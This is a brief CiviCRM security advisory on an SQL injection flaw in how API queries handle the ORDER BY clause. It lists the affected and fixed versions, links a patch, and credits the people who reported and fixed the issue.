When generating an API query, the ORDER BY clause for some entities was not correctly validated and escaped. This may have permitted data disclosure via time-based blind SQL attacks.
This is mitigated by the fact that attacks would require API access to exploit the vulnerability.
- 4.7.13 and earlier
- 4.6.23 and earlier
- 4.7.14
- 4.6.24
- Upgrade to the latest CiviCRM version
- Apply the following patch if you cannot upgrade: https://github.com/civicrm/civicrm-core/pull/9343
Mattias Michaux for reporting the issue
Seamus Lee for fixing the issue